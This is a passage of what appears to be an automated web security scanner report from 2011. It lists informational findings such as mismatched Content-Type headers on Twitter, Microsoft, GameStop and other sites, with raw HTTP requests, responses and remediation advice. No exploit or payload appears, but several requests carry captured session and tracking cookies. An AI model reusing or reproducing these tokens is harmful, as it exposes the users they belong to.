Host:	http://www.aaa.com
Path:	/scripts/WebObjects.dll/ZipCode.woa/wa/route

Request

Response

28.23. http://www.bnymellon.com/earnings.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bnymellon.com
Path:	/earnings.html

Request

GET /earnings.html HTTP/1.1
Host: www.bnymellon.com
Proxy-Connection: keep-alive
Referer: http://www.bnymellon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookies=true

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:49:22 GMT
Content-type: text/html
Connection: close

<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns ="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

28.24. http://www.builtritecc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.builtritecc.com
Path:	/

Request

GET / HTTP/1.1
Host: www.builtritecc.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/locate-dealer?zip=10010

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:50:05 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 25 Oct 2010 12:45:54 GMT
ETag: "8b48071-4d-493705f758480"
Accept-Ranges: bytes
Content-Length: 77
Content-Type: text/html

<script languange=\"JavaScript\"> window.location.href='home.html'; </script>

28.25. http://www.gamestop.com/JavaScript/CertonaTable.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gamestop.com
Path:	/JavaScript/CertonaTable.htm

Request

GET /JavaScript/CertonaTable.htm HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MobileDetectRedirect=UserDeviceAndPreference=NonMobile; SearchCount=; CookieStateV1=; CS_Anonymous={02e317c5-f7cb-4609-91cb-25c98f050ae0}; CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383; BIGipServerwww.gamestop.com-80=650777772.20480.0000; s_pers=%20s_vs%3D1%7C1311093155823%3B%20gpv%3Dhomepage%253A%2520homepage%7C1311093155836%3B%20s_nr%3D1311091355838-New%7C1342627355838%3B%20s_dl%3D1%7C1311093155841%3B%20s_cvp2%3D%255B%255B'Direct%252520Load'%252C'1311091355845'%255D%255D%7C1468944155845%3B%20ttcp%3D1311177755847%7C1311177755847%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20intcmp%3D%3B%20omtc%3D%3B%20cmgvo%3DDirect%2520LoadundefinedDirect%2520Load%3B%20s_ni%3DNo%2520Match%3B%20s_sq%3D%3B; s_vi=[CS]v1|2712D54A05079204-60000102C001DD4F[CE]; __utma=17130671.1755673011.1311091358.1311091358.1311091358.1; __utmb=17130671.1.10.1311091358; __utmc=17130671; __utmz=17130671.1311091358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LocaleCookie=en-us; CactusState=V=1&31=True; RES_TRACKINGID=

Response

HTTP/1.1 200 OK
Cache-Control: max-age=259200
Content-Type: text/html
Content-Location: http://www.gamestop.com/JavaScript/CertonaTable.htm
Last-Modified: Mon, 18 Jul 2011 18:03:14 GMT
Accept-Ranges: bytes
ETag: "cc25b6f67445cc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 473
Date: Tue, 19 Jul 2011 16:02:31 GMT
Connection: close
Vary: Accept-Encoding

...<table class="endeca_grid">
<tbody>
{#foreach $T.d as post}
<tr class=' ' onclick="window.location='{$T.post.ProductUrl}'">
<td class="itemboxart">
<img alt='' src='{$T.p
...[SNIP]...

28.26. http://www.seapine.com/ttpro.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.seapine.com
Path:	/ttpro.html

Request

Response

29. Content type incorrectly stated previous next
There are 52 instances of this issue:

http://a0.twimg.com/profile_images/534697216/MoMA_Twitter_Icon4_normal.gif
http://a1.twimg.com/profile_images/136003673/bcom_72x72_bigger_normal.gif
http://admeld.lucidmedia.com/clicksense/admeld/match
http://answers.microsoft.com/en-us/Site/SetTimeZoneOffset
http://answers.microsoft.com/en-us/site/resources
http://api.twitter.com/1/statuses/user_timeline.json
http://b3.mookie1.com/2/ticketmaster/minorcat/1/11408426983@x02
http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96
http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96
http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96
http://b3.mookie1.com/favicon.ico
http://bing.fansnap.com/ejs_templates/seats_page/known_tooltip.ejs
http://bing.fansnap.com/ejs_templates/seats_page/ticket_sets/new_base/marker/photo_sec_none.ejs
http://bing.fansnap.com/favicon.ico
http://bing.fansnap.com/seats/ajax/get_vfs_data
http://charts.edgar-online.com/ext/charts.dll
http://i3.onlinehelp.microsoft.com/areas/onlinehelp/content/styles/bing/OnlineHelp_GC.css
http://investor.realnetworks.com/common/images/icon_share.gif
http://media.gamehouse.com/7/images/favicon.ico
http://mobile.ebay.com/wp-content/themes/platformpro/images/iconMobileWeb_171x171.png
http://mobile.ebay.com/wp-content/themes/platformpro/images/imgSubPageContBG.gif
http://news.google.com/news/xhr/eit
http://now.eloqua.com/visitor/v200/svrGP.aspx
http://rac.custhelp.com/ci/browserSearch/desc/http%3A%2F%2Frac.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png
http://rad.msn.com/ADSAdClient31.dll
http://real.custhelp.com/ci/browserSearch/desc/http%3A%2F%2Freal.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png
http://realnetworksrealarca.tt.omtrdc.net/m2/realnetworksrealarca/mbox/standard
http://res.mobileweb.ebay.com/nbinternal/nbblank.gif
http://sales.liveperson.net/hcp/html/mTag.js
http://sharethis.com/favicon.ico
http://stubhub-www.baynote.net/baynote/tags3/common
http://stubhub.tt.omtrdc.net/m2/stubhub/mbox/standard
http://superpass.custhelp.com/ci/browserSearch/desc/http%3A%2F%2Fsuperpass.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png
http://support.microsoft.com/library/images/support/en-AU/askcasey_Btn.gif
http://support.microsoft.com/library/images/support/en-AU/askcasey_topqa.gif
https://support.microsoft.com/library/images/support/en-US/IE9_BG-img.jpg
http://verify.authorize.net/anetseal/images/secure90x72.gif
http://video.msn.com/services/user/info
http://waypointlivingspaces.com/sites/default/files/waypoint_favicon.ico
http://www.atlassian.com/favicon.ico
http://www.cesal.ro/js/globalizationro-RO.js
http://www.factset.com/files/xmlfeeds/current.fds
http://www.fansnap.com/favicon.ico
http://www.google.com/search
http://www.googlelabs.com/show_app_thumbnail
http://www.mookie1.com/favicon.ico
http://www.netlogiq.ro/ajaxpro/Layout,App_Web_glwxmlys.ashx
http://www.rallydev.com/favicon.ico
http://www.res-x.com/ws/r2/Resonance.aspx
http://www.seapine.com/favicon.ico
http://www.stubhub.com/content/getPromoContent
http://www.stubhub.com/favicon.ico

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

29.1. http://a0.twimg.com/profile_images/534697216/MoMA_Twitter_Icon4_normal.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a0.twimg.com
Path:	/profile_images/534697216/MoMA_Twitter_Icon4_normal.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/534697216/MoMA_Twitter_Icon4_normal.gif HTTP/1.1
Host: a0.twimg.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: 2R7/cqdGsVAd9FAQFI/8xuVbx3DQJPyoSpTepa4Qyq6KtMAhml6FeTVzri40fC2Z
x-amz-request-id: D98F6A057F73B07C
Last-Modified: Thu, 19 Nov 2009 22:50:19 GMT
ETag: "af2cabb308c3ca8203b70d63588b247f"
Accept-Ranges: bytes
Content-Length: 1690
Server: AmazonS3
X-Amz-Cf-Id: a415fcbc7cfa38e75c822e83635d23af15c4a9bcc56e5421754d04691bbf479cad13247eedf0cf39,58f5f4a65b5840a189a08e2ea2bc57d86b0936eec763c036e7e6977d0f6d6c16daa155c74a73a587
X-CDN: AKAM
Cache-Control: max-age=23014153
Expires: Wed, 11 Apr 2012 00:17:22 GMT
Date: Tue, 19 Jul 2011 15:28:09 GMT
Connection: close
Content-Type: image/gif
X-CDN: AKAM

.PNG
.
...IHDR...0...0......`n.... pHYs...H...H.F.k>... vpAg...0...0....W...7IDATX..X[l.U...efw.....E......... ...
.Z@!E..<.M...y......Z|...%.`...,.Zz..-.R"mh....vwfggg.9>L]I....y................B0.
...[SNIP]...

29.2. http://a1.twimg.com/profile_images/136003673/bcom_72x72_bigger_normal.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a1.twimg.com
Path:	/profile_images/136003673/bcom_72x72_bigger_normal.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/136003673/bcom_72x72_bigger_normal.gif HTTP/1.1
Host: a1.twimg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:26 GMT
Expires: Fri, 19 Jul 2019 17:53:12 GMT
Last-Modified: Mon, 13 Apr 2009 15:58:10 GMT
Cache-Control: max-age=252460800
Content-Type: image/gif
ETag: "e4a3f5b621f3c7eacf511468f8e14254"
Server: AmazonS3
X-Amz-Cf-Id: 7a80506aa13a2ca25ec0e8cde76f6bf9eb8f925f20e12d0f09efb7286986fc3a95871c1f73f0306a,ee19b7dacb30f5d0a9f678c2b4d2323c8bb789aa0075f49c8736fd256e743e49a563a4050c7f6293
x-amz-id-2: 3bJ2YgQUCAPUzKmJClmwDh/NzxlmRV+ORZyRFTAVhEL04oj4L6zeQy7zSBe7S1yE
x-amz-request-id: 3A6689485C9AA3BB
X-Cache: Miss from cloudfront
Content-Length: 2896

.PNG
.
...IHDR...0...0......`n.... pHYs...H...H.F.k>... vpAg...0...0....W..
.IDATX...ilT.....o..f.......l....Y...I@AUR..j.F.....RU.w........I.6{R.Q. ...l..1..0.....oo.ro.5.yl.*..{w......{..g !..?
...[SNIP]...

29.3. http://admeld.lucidmedia.com/clicksense/admeld/match previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://admeld.lucidmedia.com
Path:	/clicksense/admeld/match

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /clicksense/admeld/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: 2=2zSglxcnUrQ; 2=2zSglxcnUrQ

Response

29.4. http://answers.microsoft.com/en-us/Site/SetTimeZoneOffset previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://answers.microsoft.com
Path:	/en-us/Site/SetTimeZoneOffset

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

POST /en-us/Site/SetTimeZoneOffset HTTP/1.1
Host: answers.microsoft.com
Proxy-Connection: keep-alive
Referer: http://answers.microsoft.com/en-us
Content-Length: 12
Origin: http://answers.microsoft.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078488618:ss=1311077969178; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:02&Microsoft.NumberOfVisits=3&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:02&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=70&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5

tzOffset=300

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Set-Cookie: tzo=300; domain=answers.microsoft.com; expires=Thu, 18-Aug-2011 15:28:35 GMT; path=/
Date: Tue, 19 Jul 2011 15:28:34 GMT
Content-Length: 1

1

29.5. http://answers.microsoft.com/en-us/site/resources previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://answers.microsoft.com
Path:	/en-us/site/resources

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /en-us/site/resources HTTP/1.1
Host: answers.microsoft.com
Proxy-Connection: keep-alive
Referer: http://answers.microsoft.com/en-us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078488618:ss=1311077969178; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:02&Microsoft.NumberOfVisits=3&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:02&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=70&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Date: Tue, 19 Jul 2011 15:28:17 GMT
Content-Length: 14849

if (typeof(Answers) == "undefined")
Answers = {};

Answers.Res = {
SiteReadOnlyMsg:'We\u2019re sorry\x21 The Answers site is temporarily in read-only mode and we cannot proceed with th
...[SNIP]...

29.6. http://api.twitter.com/1/statuses/user_timeline.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/statuses/user_timeline.json

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /1/statuses/user_timeline.json?screen_name=majornelson&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=10&since_id=93451027130486785&refresh=true&clientsource=TWITTERINC_WIDGET&1311118946276=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://majornelson.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A130884465537011414; k=173.193.214.243.1311018175028268; __utma=43838368.1598605414.1305368954.1311018185.1311089296.18; __utmz=43838368.1311089296.18.11.utmcsr=microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/systemcenter/en/us/try-it.aspx; __utmv=43838368.lang%3A%20en; original_referer=OTZIBTkFw3v2qtbTzneP5MlIz9cQBF6V; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCGlPx0QxAToHaWQiJWRmOGVjZTMxZDMyZGQ4%250ANDY2ZGFjMDQ4NGFiODljM2I1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--51cee242652b2fbff232eb217ef719443c54f96d

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 23:43:39 GMT
Server: hi
Status: 200 OK
X-Transaction: 1311119019-44874-63027
X-RateLimit-Limit: 150
ETag: "c4496a2500a04acae94431807a040161"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Tue, 19 Jul 2011 23:43:39 GMT
X-RateLimit-Remaining: 145
X-Runtime: 0.03172
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114ac0fc3df
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: a31a21497a04d3e098dd481ef7efb944e773d8c5
X-RateLimit-Reset: 1311122537
Vary: Accept-Encoding
Content-Length: 34
Connection: close

TWTR.Widget.receiveCallback_1([]);

29.7. http://b3.mookie1.com/2/ticketmaster/minorcat/1/11408426983@x02 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/minorcat/1/11408426983@x02

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

29.8. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://b3.mookie1.com
Path:	/2/zzzSample/wwww.themig.com/1627503762@x96

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

29.9. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://b3.mookie1.com
Path:	/2/zzzSample/wwww.themig.com/1936689153@x96

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

29.10. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://b3.mookie1.com
Path:	/2/zzzSample/wwww.themig.com/1@x96

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

29.11. http://b3.mookie1.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://b3.mookie1.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D; session=1311100939|1311100967

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:43:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 15:12:32 GMT
ETag: "a10220-1cee-48821a2b65800"
Accept-Ranges: bytes
Content-Length: 7406
Content-Type: text/plain

..............h...6... ..............00..........F...(....... ...........@.......................95..G<'.D:'.F<'.@9+......R...N...c...W...Z...G...Q...U..@}.......C...............T...J..Z...m...+t..t.
...[SNIP]...

29.12. http://bing.fansnap.com/ejs_templates/seats_page/known_tooltip.ejs previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bing.fansnap.com
Path:	/ejs_templates/seats_page/known_tooltip.ejs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain HTML.

Request

Response

29.13. http://bing.fansnap.com/ejs_templates/seats_page/ticket_sets/new_base/marker/photo_sec_none.ejs previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bing.fansnap.com
Path:	/ejs_templates/seats_page/ticket_sets/new_base/marker/photo_sec_none.ejs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain HTML.

Request

Response

29.14. http://bing.fansnap.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bing.fansnap.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
